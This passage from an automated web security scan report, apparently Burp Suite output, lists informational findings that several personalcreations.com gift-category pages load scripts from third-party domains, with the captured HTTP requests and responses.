<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.22. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-birthday-gifts-PBIRBSL

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /personalized-birthday-gifts-PBIRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:13 PM?0&9/3/2011 6:20:03 PM?0&9/3/2011 6:19:51 PM?0&9/3/2011 6:19:27 PM?0&9/3/2011 6:19:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:46 GMT
Connection: close
Content-Length: 411135

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.23. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-birthday-gifts-her-PHERBIR

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /personalized-birthday-gifts-her-PHERBIR HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM?0&9/3/2011 6:29:35 PM?0&9/3/2011 6:30:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:30:12 GMT
Connection: close
Content-Length: 318870

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.24. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-business-gifts-PBIZGFT

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /personalized-business-gifts-PBIZGFT HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:37 PM?0&9/3/2011 6:20:23 PM?0&9/3/2011 6:20:48 PM?0&9/3/2011 6:20:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:45 GMT
Connection: close
Content-Length: 189636

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
